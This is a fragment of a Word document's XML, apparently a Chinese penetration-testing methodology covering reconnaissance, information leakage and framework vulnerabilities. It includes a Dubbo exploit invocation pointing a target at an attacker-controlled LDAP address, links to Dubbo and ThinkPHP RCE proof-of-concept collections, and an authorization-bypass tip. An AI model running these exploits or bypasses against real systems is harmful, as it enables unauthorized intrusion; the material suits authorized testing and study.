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3427095</wp:posOffset>
                        </wp:positionH>
                      </mc:Fallback>
                    </mc:AlternateContent>
                    <mc:AlternateContent>
                      <mc:Choice Requires="wp14">
                        <wp:positionV relativeFrom="page">
                          <wp14:pctPosVOffset>2500</wp14:pctPosVOffset>
                        </wp:positionV>
                      </mc:Choice>
                      <mc:Fallback>
                        <wp:positionV relativeFrom="page">
                          <wp:posOffset>259080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85pt;margin-top:20.4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bidi w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc27676904"/>
      <w:bookmarkStart w:id="2" w:name="_Toc527108518"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务规划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc527108519"/>
      <w:bookmarkStart w:id="4" w:name="_Toc27676905"/>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527108520"/>
      <w:bookmarkStart w:id="6" w:name="_Toc27676906"/>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527108521"/>
      <w:bookmarkStart w:id="8" w:name="_Toc27676907"/>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527108522"/>
      <w:bookmarkStart w:id="10" w:name="_Toc27676908"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc27676910"/>
      <w:bookmarkStart w:id="12" w:name="_Toc527108524"/>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27676915"/>
      <w:bookmarkStart w:id="22" w:name="_Toc527108529"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码仓库信息泄露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="2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527108530"/>
      <w:bookmarkStart w:id="24" w:name="_Toc27676916"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索引擎信息泄露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="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527108531"/>
      <w:bookmarkStart w:id="28" w:name="_Toc27676917"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常及DEBUG信息泄露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="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527108533"/>
      <w:bookmarkStart w:id="31" w:name="_Toc27676919"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发框架漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>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Java框架中的漏洞几乎都是反序列化引起的，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">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Dubbo端口20880，可telnet连接，使用ls命令获取接口。</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。需要在机器上启动交互服务进行验证。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Fonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令格式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
        </w:rPr>
        <w:t>python poc.py 1.1.1.1 12345 ldap://1.1.1.6:80/exp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CVE-2021-25641</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</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"https://github.com/scopion/CVE-2021-25641-Proof-of-Concept" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="18"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/scopion/CVE-2021-25641-Proof-of-Concept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CVECVE-2021-30179：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://cloud.tencent.com/developer/article/1865563</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其他：</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"https://github.com/threedr3am/learnjavabug/tree/master/dubbo" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="18"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/threedr3am/learnjavabug/tree/master/dubbo</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"https://github.com/scopion/dubbo-exp" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="18"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/scopion/dubbo-exp</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"https://github.com/lz2y/DubboPOC" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="18"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/lz2y/DubboPOC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>THINKPHP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/Lotus6/ThinkphpGUI</w:t>
      </w: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bookmarkStart w:id="131" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="131"/>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8"/>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27676921"/>
      <w:bookmarkStart w:id="37" w:name="_Toc527108535"/>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27676922"/>
      <w:bookmarkStart w:id="39" w:name="_Toc527108536"/>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2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2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2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27676924"/>
      <w:bookmarkStart w:id="44" w:name="_Toc527108538"/>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527108539"/>
      <w:bookmarkStart w:id="46" w:name="_Toc27676925"/>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30"/>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1"/>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3"/>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5"/>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36"/>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37"/>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38"/>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39"/>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40"/>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20"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞地址：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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41"/>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42"/>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43"/>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27676934"/>
      <w:bookmarkStart w:id="55" w:name="_Toc526872535"/>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44"/>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45"/>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46"/>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47"/>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49"/>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50"/>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51"/>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52"/>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53"/>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54"/>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55"/>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56"/>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57"/>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58"/>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59"/>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61"/>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62"/>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63"/>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64"/>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68"/>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bookmarkStart w:id="59" w:name="_Toc27676938"/>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70"/>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71"/>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72"/>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76"/>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78"/>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80"/>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81"/>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87"/>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8"/>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94"/>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5"/>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99"/>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07"/>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08"/>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15"/>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17"/>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18"/>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19"/>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20"/>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1"/>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22"/>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25"/>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26"/>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9"/>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4"/>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2"/>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43"/>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46" r:link="rId1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69" w:name="_Hlk526762416"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>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51"/>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52"/>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53"/>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54"/>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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在Java框架下，在路径后面添加/可能绕过权限校验</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58"/>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59"/>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2"/>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5"/>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66"/>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7"/>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69"/>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70"/>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72"/>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73"/>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74"/>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75"/>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76"/>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77"/>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8"/>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79"/>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80"/>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81"/>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82"/>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83"/>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5"/>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89"/>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90"/>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92"/>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93"/>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94"/>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95"/>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96"/>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97"/>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98"/>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99"/>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00"/>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01"/>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02"/>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07"/>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1"/>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2"/>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13"/>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14"/>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17"/>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18"/>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19"/>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20"/>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20"/>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21"/>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22"/>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75"/>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23"/>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24"/>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26"/>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28"/>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29"/>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0"/>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31"/>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32"/>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33"/>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34"/>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35"/>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1"/>
      <w:bookmarkStart w:id="81"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36"/>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37"/>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38"/>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39"/>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0"/>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3"/>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5"/>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6"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>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5"/>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82"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56"/>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57"/>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58"/>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59"/>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60"/>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61"/>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62"/>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63"/>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64"/>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35"/>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5"/>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66"/>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7"/>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8"/>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9"/>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71"/>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72"/>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73"/>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74"/>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75"/>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6"/>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77"/>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8"/>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79"/>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80"/>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1"/>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84" w:name="_Toc527108567"/>
      <w:bookmarkStart w:id="85" w:name="_Toc27676956"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>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4"/>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5"/>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6"/>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527108569"/>
      <w:bookmarkStart w:id="89" w:name="_Toc27676958"/>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527108570"/>
      <w:bookmarkStart w:id="91" w:name="_Toc27676959"/>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527108571"/>
      <w:bookmarkStart w:id="93" w:name="_Toc27676960"/>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00"/>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02"/>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27676963"/>
      <w:bookmarkStart w:id="99" w:name="_Toc527108574"/>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15"/>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6"/>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17"/>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20"/>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27676968"/>
      <w:bookmarkStart w:id="109" w:name="_Toc527108579"/>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21"/>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527108580"/>
      <w:bookmarkStart w:id="111" w:name="_Toc27676969"/>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22"/>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527108581"/>
      <w:bookmarkStart w:id="113" w:name="_Toc27676970"/>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23"/>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24"/>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6"/>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8"/>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527108584"/>
      <w:bookmarkStart w:id="120" w:name="_Toc27676974"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其他Web漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc27676975"/>
      <w:bookmarkStart w:id="122" w:name="_Toc52710858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3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3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27676976"/>
      <w:bookmarkStart w:id="124" w:name="_Toc52710858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3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3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3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527108587"/>
      <w:bookmarkStart w:id="126" w:name="_Toc2767697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3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3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3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4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4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4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27" w:name="_Toc527108588"/>
      <w:bookmarkStart w:id="128" w:name="_Toc2767697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27676979"/>
      <w:bookmarkStart w:id="130" w:name="_Toc52710858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7653F6B"/>
    <w:rsid w:val="095D0C27"/>
    <w:rsid w:val="0A912F93"/>
    <w:rsid w:val="0AC22452"/>
    <w:rsid w:val="100A78CD"/>
    <w:rsid w:val="10D35E80"/>
    <w:rsid w:val="1168502E"/>
    <w:rsid w:val="11B6383E"/>
    <w:rsid w:val="139C7863"/>
    <w:rsid w:val="14727856"/>
    <w:rsid w:val="17133677"/>
    <w:rsid w:val="18021C9D"/>
    <w:rsid w:val="19F3615C"/>
    <w:rsid w:val="1CFD4123"/>
    <w:rsid w:val="1E967B0D"/>
    <w:rsid w:val="206F6973"/>
    <w:rsid w:val="25BB1045"/>
    <w:rsid w:val="26017D8F"/>
    <w:rsid w:val="29282331"/>
    <w:rsid w:val="2A8D41FF"/>
    <w:rsid w:val="2CF46CBB"/>
    <w:rsid w:val="314C75B4"/>
    <w:rsid w:val="31835741"/>
    <w:rsid w:val="31EA0EF6"/>
    <w:rsid w:val="331F7860"/>
    <w:rsid w:val="35C84F5C"/>
    <w:rsid w:val="37852294"/>
    <w:rsid w:val="38BA4596"/>
    <w:rsid w:val="3A0A6503"/>
    <w:rsid w:val="3CFE5F3B"/>
    <w:rsid w:val="3D2D3FAD"/>
    <w:rsid w:val="3F447016"/>
    <w:rsid w:val="401730F1"/>
    <w:rsid w:val="46DF52D8"/>
    <w:rsid w:val="483E76E2"/>
    <w:rsid w:val="485F46CE"/>
    <w:rsid w:val="49920F54"/>
    <w:rsid w:val="4A813CA2"/>
    <w:rsid w:val="4CF00C52"/>
    <w:rsid w:val="4ED55BCC"/>
    <w:rsid w:val="4F2F3AB1"/>
    <w:rsid w:val="51E22C34"/>
    <w:rsid w:val="53F56D90"/>
    <w:rsid w:val="58DE503E"/>
    <w:rsid w:val="5A0E306F"/>
    <w:rsid w:val="5ADD74BE"/>
    <w:rsid w:val="5D4B7EEB"/>
    <w:rsid w:val="5E1A1D2A"/>
    <w:rsid w:val="5F3A64DA"/>
    <w:rsid w:val="621D206B"/>
    <w:rsid w:val="62CD15CF"/>
    <w:rsid w:val="64DB38D3"/>
    <w:rsid w:val="65710DFE"/>
    <w:rsid w:val="67DE54B0"/>
    <w:rsid w:val="68907E87"/>
    <w:rsid w:val="6E024488"/>
    <w:rsid w:val="72FF2D82"/>
    <w:rsid w:val="740873B4"/>
    <w:rsid w:val="76E15961"/>
    <w:rsid w:val="78037895"/>
    <w:rsid w:val="789E69CB"/>
    <w:rsid w:val="7C0A1E1A"/>
    <w:rsid w:val="7DF46E3B"/>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jpe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jpe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hyperlink" Target="http://static.wooyun.org/wooyun/upload/201602/2510125822aeb08ad57a3e659b5a511c8bcd3c83.png" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image193.jpe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jpeg"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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http://static.wooyun.org/wooyun/upload/201505/261950541076ed36680b3f4e70dc40209b6b1efe.png" TargetMode="Externa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2021-10-22T07:55:31Z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